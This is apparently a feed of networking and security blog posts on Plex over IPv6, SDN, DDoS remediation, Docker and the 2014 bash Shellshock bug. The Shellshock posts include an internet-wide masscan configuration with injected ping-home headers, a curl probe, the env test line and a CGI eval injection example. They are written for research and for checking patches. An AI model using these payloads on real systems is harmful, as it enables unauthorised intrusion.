IPv6 in my streaming media? More likely than you think!

Not that I go out of my way to endorse one project/product over another, but there is one I have recently fallen in love with for streaming my media, especially since it can use IPv6! I needed a cross-platform solution for my streaming needs. I was originally using XBMC, but it was only tied into the TV, and I use several other computers and devices in locations outside of the house. So I read up on Plex, got it installed with little to no effort, and could readily access my content wherever I was. I even tested this on my last trip to London, UK and was able to get a decent 1.2 Mbit/s stream from my house. The only issue was that it wasn’t using IPv6, either in the app or when accessing via plex.tv (the server on that site only comes up with an IPv4 address).

So, poking around, I discovered two things: 1) I could access the Plex server directly at the IP/hostname of the server, and 2) there was a checkbox to enable IPv6!
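Once that box is ticked, a quick way to verify from another dual-stacked machine that the server really answers over IPv6 is a curl probe (a hedged sketch: 32400 is the usual Plex port, and the hostname and address below are placeholders for your own server; any URL that answers proves connectivity):

# Force curl over IPv6 to the Plex web port:
curl -6 -sS http://plex.example.home:32400/web
# Or hit an IPv6 literal directly; -g stops curl from globbing the brackets:
curl -g -sS "http://[2001:db8::10]:32400/web"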

[Screenshot: the Plex server network settings page, with the option to enable IPv6]

Simply browse to your Plex server, click on the settings icon (screwdriver + wrench), select Server, click on Networking and then “Show Continue reading

Many eyes theory conclusively disproven

A bug being found in open-source software does not, by itself, disprove the "many eyes" theory. What disproves it is that these bugs are being found now, when they should've been found sometime in the last 25 years.

Many eyes are obviously looking at bash now, and they are finding fairly obvious problems. It's clear that the parsing code in bash is deeply flawed, even though any particular bug isn't so obvious. If many eyes had been looking at bash over the past 25 years, these bugs would've been found a long time ago.

Thus, we know that "many eyes" haven't been looking at bash.

The theory in question is the claim, promoted by open-source advocates, that "many eyes make bugs shallow": the idea that open-source will have fewer bugs (and fewer security problems) since anyone can look at the code.

What we've seen is that, in fact, very few people ever read code, even when it's open-source. The average programmer writes 10x more code than they read. The only people for whom that equation is reversed are professional code auditors, and they are hired primarily to audit closed-source code. Companies like Microsoft pay programmers to review code because reviewing code is not otherwise something programmers like to do.

From Continue reading

MidoNet for the Overlay, Cumulus Linux for the Underlay. Like Coffee and Cream.

VTEP is not the only way MidoNet customers can use a switch that runs Cumulus Linux as the underlay (physical network) for the virtual, overlay networks.

Earlier in 2014, we announced a partnership with Cumulus Networks to use Cumulus Linux as a Layer 2 VXLAN gateway, bridging VLANs in the virtual network world to VLANs in the physical world.

We’ve shipped that code as part of MidoNet version 1.6.
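In plain Linux terms, that L2 gateway function looks something like the following hypothetical sketch: terminate a VXLAN VNI on the switch and bridge it to a tagged VLAN on a front-panel port (all IDs, names and addresses here are invented for illustration):

# Create the VXLAN termination point (VNI 10100) and a VLAN 100
# subinterface on physical port swp1, then bridge the two together:
ip link add vx100 type vxlan id 10100 local 10.0.0.1 dstport 4789
ip link add link swp1 name swp1.100 type vlan id 100
ip link add br100 type bridge
ip link set vx100 master br100
ip link set swp1.100 master br100
ip link set vx100 up; ip link set swp1.100 up; ip link set br100 up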

We now want to talk about how VTEP is not the only way MidoNet customers can use a switch running Cumulus Linux as the underlay (physical network) for virtual overlay networks. Don’t think of running a set of gateway switches as the only way to benefit from these devices; we see many other opportunities and benefits.

Here are some examples of why it makes sense:

Automation

Remember that Cumulus Linux IS Linux. It’s not a switch OS that just happens to be based on Linux. It offers the cloud automation capabilities that are so crucial to customers who are moving towards building a cloud. If you listen to customers, systems like Chef and Puppet are widely used in the deployment of systems like OpenStack, Continue reading
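To make that point concrete, here is a hypothetical sketch of what "IS Linux" buys you: the same Debian-style interface files and package tools that your server automation already handles (the port name swp1 and the address are examples):

# A front-panel switch port is configured like any Debian interface:
cat >> /etc/network/interfaces <<'EOF'
auto swp1
iface swp1 inet static
    address 10.1.1.1/24
EOF
ifup swp1
# And configuration-management agents install from packages, as on any server:
apt-get install -y puppet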

FCC advised on Remediation of Server-based DDoS Attacks

Yesterday, the Communications Security, Reliability and Interoperability Council (CSRIC), a federal advisory committee to the Federal Communications Commission (FCC), submitted its final report on Remediation of Server-based DDoS Attacks.

The CSRIC’s Working Group 5 was tasked with developing recommendations for communications providers to enable them to mitigate the impact of high volume DDoS attacks launched from large data center and hosting environments.

The final report includes a comprehensive look at the DDoS threat landscape, covering everything from the massive size of today’s attacks to the potential for collateral damage. The report describes how DDoS attacks are becoming increasingly complex and how they are being used as a diversion “to distract security resources while other attacks are being attempted, e.g., fraudulent transactions.” It also discusses how botnet architectures are becoming more sophisticated and difficult to trace.

Given this complex and challenging threat landscape, we were grateful for the opportunity to contribute. The CSRIC has adapted Arbor Networks’ best practices for DDoS incident response as the Six Phases for DDoS Attack Preparation & Response.

[Figure: The Six Phases for DDoS Attack Preparation & Response]

Roland Dobbins, senior analyst with Arbor’s Security Engineering & Response Team (ASERT), served as the Internet sub-group chairman of CSRIC IV WG5 – Server-Based Continue reading

PQ Show 33 – Intel Rack Scale Architecture – Real or Impractical ?

At the IDF 2014 conference, Intel made a big song and dance about their Rack Scale Architecture, which removes the need for “top of rack” networking and changes the nature of servers in a big way. My initial impression is that this has limited application in the enterprise or with cloud providers, but it might be useful […]

Author information

Greg Ferro

Greg Ferro is a Network Engineer/Architect, mostly focussed on Data Centre, Security Infrastructure, and recently Virtualization. He has over 20 years in IT, working as a freelance consultant for a wide range of employers including Finance, Service Providers and Online Companies. He is CCIE#6920 and has a few ideas about the world, but not enough to really count.

He is a host on the Packet Pushers Podcast, a blogger at EtherealMind.com, and is on Twitter as @etherealmind and on Google Plus.

The post PQ Show 33 – Intel Rack Scale Architecture – Real or Impractical ? appeared first on Packet Pushers Podcast and was written by Greg Ferro.

Three Big SDN Questions for Your SDN Development Plan

SDN is happening. What questions should you be asking about your own development plan to learn SDN skills?

I’ve been thinking about this question in preparation for an upcoming Interop Debate on October 1st, where we’ll be discussing whether to pursue traditional certifications versus learning about SDN. Today’s post begins a series on topics surrounding that debate. To begin, we’ll look at three big-picture questions you should ask when you get serious about studying SDN.

Overview

How much of your skill set happened to you, rather than being something you planned? How much of your learning relates to surviving today’s job tasks, versus learning for the future?

Let’s face it: many days, we do the job in front of us, with little time to devote to learning something unrelated. Still, development is a fundamental question for any IT knowledge-based worker. Do you have a development plan? Do you spend time working that plan? And now, with SDN happening, how should you revise that plan? In the time you can devote this week/month/year, what should you be learning about SDN?

Some people will wait to learn SDN when the next project Continue reading

Network Taps, Monitoring & Visibility Fabrics: Modern Packet Sniffing

Before we get into observed trends, let’s put some context on this post and define what we mean by monitoring. Network monitoring and tapping can be described as “packet capture, packet and session analysis, and NetFlow generation with analytics”. Tap fabrics typically provide a means of extracting packets from a network, but not so much the analysis; tools like Wireshark, Lancope’s StealthWatch and a good IDP solution are still required.

Current Situation and Legacy Methodology

In days past (and in most current networks), if you wanted to harvest packets from a network, the quickest route was to mirror a port to a server running Wireshark and filter the results to make sense of what was going on from a protocol and application point of view. Cisco have tools like the NAM, which comes in several forms, such as a standalone server, a Catalyst 6500 switch module and an ISR module. The NAM allows you to visually observe network trends and conversations via generated graphs, and also to inspect traffic by downloading the PCAP files. It is probably one of the most pleasant experiences most people have, in addition to Wireshark.
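The capture side of that legacy approach is usually a one-liner; here is a sketch, with the monitor interface name and file path as assumptions:

# Capture the mirrored traffic arriving on the monitor NIC into a PCAP
# file, pre-filtered to HTTP so the trace stays manageable:
tcpdump -i eth1 -s 0 -w /tmp/mirror.pcap 'tcp port 80'
# Open /tmp/mirror.pcap in Wireshark for protocol and conversation analysis.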

Some shortcomings exist with this approach, inasmuch as the device that receives the mirrored Continue reading

Policy versus ACLs, it’s those exposed implementation details again

In a blog week dedicated to applications and the policies that govern them, I wanted to add some detail on a discussion I have with customers quite often. It should be clear that we at Plexxi believe in application-policy-driven network behavior. Our Affinities allow you to specify desired behavior between network endpoints, and they will evolve with the enormous amount of policy work Mat described in his three-part article earlier this week.

ACL

Many times when I discuss Affinities and policies with customers, or more generically with network engineering types, the explanation almost always lands at Access Control Lists (ACLs). Cisco created the concept of ACLs (and their many variations used for other policy constructs) way back as a mechanism to instruct the switching chips inside their routers to accept or drop traffic. It started with a very simple “traffic from this source to this destination is dropped” and has evolved very significantly since then, in Cisco’s implementation and those of many other router and switch vendors.

There are two basic components in an ACL:

1. what should I match a packet on, and

2. what action do I take once I find a match (sketched below in generic Linux terms).
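As a generic illustration of that match-plus-action structure, here is a Linux iptables sketch (not Plexxi or Cisco syntax; the addresses and port are examples):

# Match traffic from a source subnet to a destination host; action: drop.
iptables -A FORWARD -s 10.1.0.0/16 -d 192.0.2.10 -j DROP
# The evolved form matches on more fields (protocol, port); action: accept.
iptables -A FORWARD -s 10.1.0.0/16 -d 192.0.2.10 -p tcp --dport 443 -j ACCEPT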

Both Continue reading

Shellshock is 20 years old (get off my lawn)

The bash issue is 20 years old. By this I don't mean the actual bug is that old (though it appears it might be), but that we've known for that long that passing HTTP values to shell scripts is a bad idea.
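A hypothetical mid-90s CGI script shows why (the script name, file paths and payload are invented for illustration):

#!/bin/sh
# search.cgi -- the classic mistake: an HTTP-supplied value is
# interpolated, unquoted, into a shell command line.
echo "Content-type: text/plain"
echo ""
# QUERY_STRING arrives straight from the client; requesting
# search.cgi?;id; makes the eval below run the attacker's id command.
eval "grep $QUERY_STRING /var/www/data.txt"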

My first experience with this was in 1995. I worked for "Network General Corporation" (which would later merge with McAfee Associates). At the time, about 1000 people worked for the company. We made the Sniffer, the original packet sniffer that gave its name to the entire class of products.

One day, the head of IT came to me with an e-mail from some unknown person informing us that our website was vulnerable. He was in standard denial, asking me to confirm that "this asshole is full of shit".

But no, whoever had sent us the email was correct, and obviously so. I was enough of a security expert that our IT guy would come to me, yet I hadn't considered that bug before (to my great embarrassment). Of course, one glance at the email and I knew it was true. I didn't have to try it out on our website, because it was self-evident in the way that Continue reading

Quick Guide to my Interop New York Sessions

I’m running or participating in five workshops or sessions during next week’s Interop New York. Three of them build on each other, so you might want to attend all of them in sequence:

Designing Infrastructure for Private Clouds starts with the requirements gathering phase and focuses on physical infrastructure design decisions, covering compute, storage, physical and virtual networking, and network services. If you plan to build a private (or a reasonably small public) cloud, start here.

Read more ...

Bash ‘shellshock’ bug is wormable

Early results from my scan: there are about 3000 systems vulnerable just on port 80, just on the root "/" URL, without the Host field. That doesn't sound like a lot, but that's not where the bug lives. Update: oops, my scan broke early in the process and stopped capturing the responses -- it's probably a lot more responses than that.

Firstly, only about 1 in 50 webservers respond correctly without the proper Host field. Scanning with the correct domain names would lead to a lot more results -- about 50 times more.

Secondly, it's things like CGI scripts that are vulnerable, deep within a website (like CPanel's /cgi-sys/defaultwebpage.cgi). Getting just the root page is the thing least likely to be vulnerable. Spidering the site and testing well-known CGI scripts (like the CPanel one) would give a lot more results, at least 10x (a hand-test sketch for one such path follows this list).

Thirdly, it's embedded webservers on odd ports that are the real danger. Scanning more ports would give a couple times more results.

Fourthly, it's not just web, but other services that are vulnerable, such as the DHCP service reported in the initial advisory.
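For reference, here is how one such hand test might look with curl, putting the payload in the User-Agent header (a sketch: the URL is a placeholder, 203.0.113.9 stands in for a machine you control, and the full /bin/ping path is used because CGI environments often have a minimal PATH):

# The "() { :; };" prefix triggers the bug; the ping only fires if
# the target's bash is vulnerable, so watch for it on your own host.
curl -A '() { :; }; /bin/ping -c 3 203.0.113.9' \
    http://target.example.com/cgi-sys/defaultwebpage.cgi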

Consequently, even though my light scan found only 3000 results, this thing is clearly Continue reading

Docker Hub Official Repos: Announcing Language Stacks


With Docker containers fast becoming the standard building blocks for distributed apps, we’re working with the Docker community to make it easier for users to quickly code and assemble their projects. Official Repos, publicly downloadable for free from the Docker Hub Registry, are curated images informed by user feedback and best practices. They represent a focused community effort to provide great base images for applications, so developers and sysadmins can focus on building new features and functionality while minimizing repetitive work on commodity scaffolding and plumbing.

At DockerCon last June, we announced the first batch of Official Repos, which covered many standard tools like OS distributions, web servers, and databases. At the time, several organizations joined us to curate Official Repos for their particular projects, including Fedora, CentOS, and Canonical. The community responded enthusiastically as well: in the three months since they launched, Official Repos have grown so much in popularity that they now account for almost 20% of all image downloads.
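Getting started with an Official Repo is a one-liner; a sketch (the tag and image names below are illustrative):

# Pull a curated Official Repo image from the Docker Hub Registry:
docker pull ubuntu:14.04
# Base your own image on it in a Dockerfile...
#   FROM ubuntu:14.04
#   RUN apt-get update && apt-get install -y curl
# ...then build and run as usual:
docker build -t myapp .
docker run --rm myapp curl --version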

Parlez-vous…?

Based on the search queries on the Docker Hub Registry and discussions with many of you, we determined that the community wants pre-built stacks of their favorite programming languages.  Specifically, developers Continue reading

Bash ‘shellshock’ scan of the Internet

NOTE: malware is now using this as its User-Agent. I haven't run a scan for over two days.

I'm running a scan of the Internet right now to test for the recent bash vulnerability and see how widespread it is. My scan works by stuffing a bunch of "ping home" commands into various CGI variables. It's coming from IP address 209.126.230.72.

The configuration file for masscan looks something like:

target-ip = 0.0.0.0/0
port = 80
banners = true
http-user-agent = shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)
http-header[Cookie] = () { :; }; ping -c 3 209.126.230.74
http-header[Host] = () { :; }; ping -c 3 209.126.230.74
http-header[Referer] = () { :; }; ping -c 3 209.126.230.74

(Actually, these last three options don't quite work due to a bug, so you have to manually add them to the code: https://github.com/robertdavidgraham/masscan/blob/master/src/proto-http.c#L120)

Some early results already show that this bug is widespread.
A discussion of the results is in the next blogpost, here. The upshot is this: while this scan found only a few thousand systems (because it's intentionally limited), it looks like the potential for a worm is high.


Bash vulnerability CVE-2014-6271 patched

This morning, Stephane Chazelas disclosed a vulnerability in the program bash, the GNU Bourne-Again Shell. This software is widely used, especially on Linux servers, such as the servers used to provide CloudFlare's performance and security cloud services.

This vulnerability is a serious risk to Internet infrastructure, as it allows remote code execution in many common configurations, and the severity is heightened due to bash being in the default configuration of most Linux servers. While bash is not directly used by remote users, it is used internally by popular software packages such as web, mail, and administration servers. In the case of a web server, a specially formatted web request, when passed by the web server to the bash application, can cause the bash software to run commands on the server for the attacker. More technical information was posted on the oss-sec mailing list.

The security community has assigned this bash vulnerability the ID CVE-2014-6271.
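The widely circulated one-line check for this CVE is worth noting here (run it locally; on an unpatched bash the injected command executes and prints "vulnerable", while a patched build only prints the final echo):

# Bash imports the string as a function definition and, when vulnerable,
# keeps executing what follows the closing brace:
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"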

As soon as we became aware of this vulnerability, CloudFlare's engineering and operations teams tested a patch to protect our servers and deployed it across our infrastructure. As of now, all CloudFlare servers are protected against CVE-2014-6271.

Everyone who is using the bash software package should upgrade Continue reading

Bash bug as big as Heartbleed

Today's bash bug is as big a deal as Heartbleed, for many reasons.

The first reason is that the bug interacts with other software in unexpected ways. We know that interacting with the shell is dangerous, but we write code that does it anyway. An enormous percentage of software interacts with the shell in some fashion. Thus, we'll never be able to catalogue all the software out there that is vulnerable to the bash bug. This is similar to the OpenSSL bug: OpenSSL is included in a bajillion software packages, so we were never able to fully quantify exactly how much software is vulnerable.

The second reason is that while the known systems (like your web-server) are patched, unknown systems remain unpatched. We see that with the Heartbleed bug: six months later, hundreds of thousands of systems remain vulnerable. These systems are rarely things like webservers, but are more often things like Internet-enabled cameras.

Internet-of-things devices like video cameras are especially vulnerable because a lot of their software is built from web-enabled bash scripts. Thus, not only are they less likely to be patched, they are more likely to expose the vulnerability to the outside world.

Unlike Heartbleed, which Continue reading

Necessity of Analytics and Monitoring in the SDN Era



by Hariharan Ananthakrishnan, Distinguished Engineer - September 24, 2014

A recent SDNCentral article about the Five Habits of Highly Effective SDN Startups asserts that achieving success in the SDN landscape will require creating focused products that solve real-world problems. In addition, the article emphasizes the need to build a sales channel with great partners, market strategically but be lean and mean, and adopt a slow and steady route into the SDN world. 

The article also laid out the new landscape of SDN as we know it. Take a look at the diagram below: the building blocks range from controllers to network operating systems to monitoring and analytics.

[Diagram: the SDN landscape, with building blocks ranging from controllers and network operating systems to monitoring and analytics]
As the above diagram illustrates, monitoring and analytics are key. With SDN, the network self-adapts to the new demands of the application, and without visibility into these changes it's very hard to say whether an SDN application is doing the right things to your network. Understanding the programmable events that happen in real time requires mature analytics technology that can correlate service delivery with physical and virtual resource states.

At Packet Design, we have been working on a solution for SDN analytics Continue reading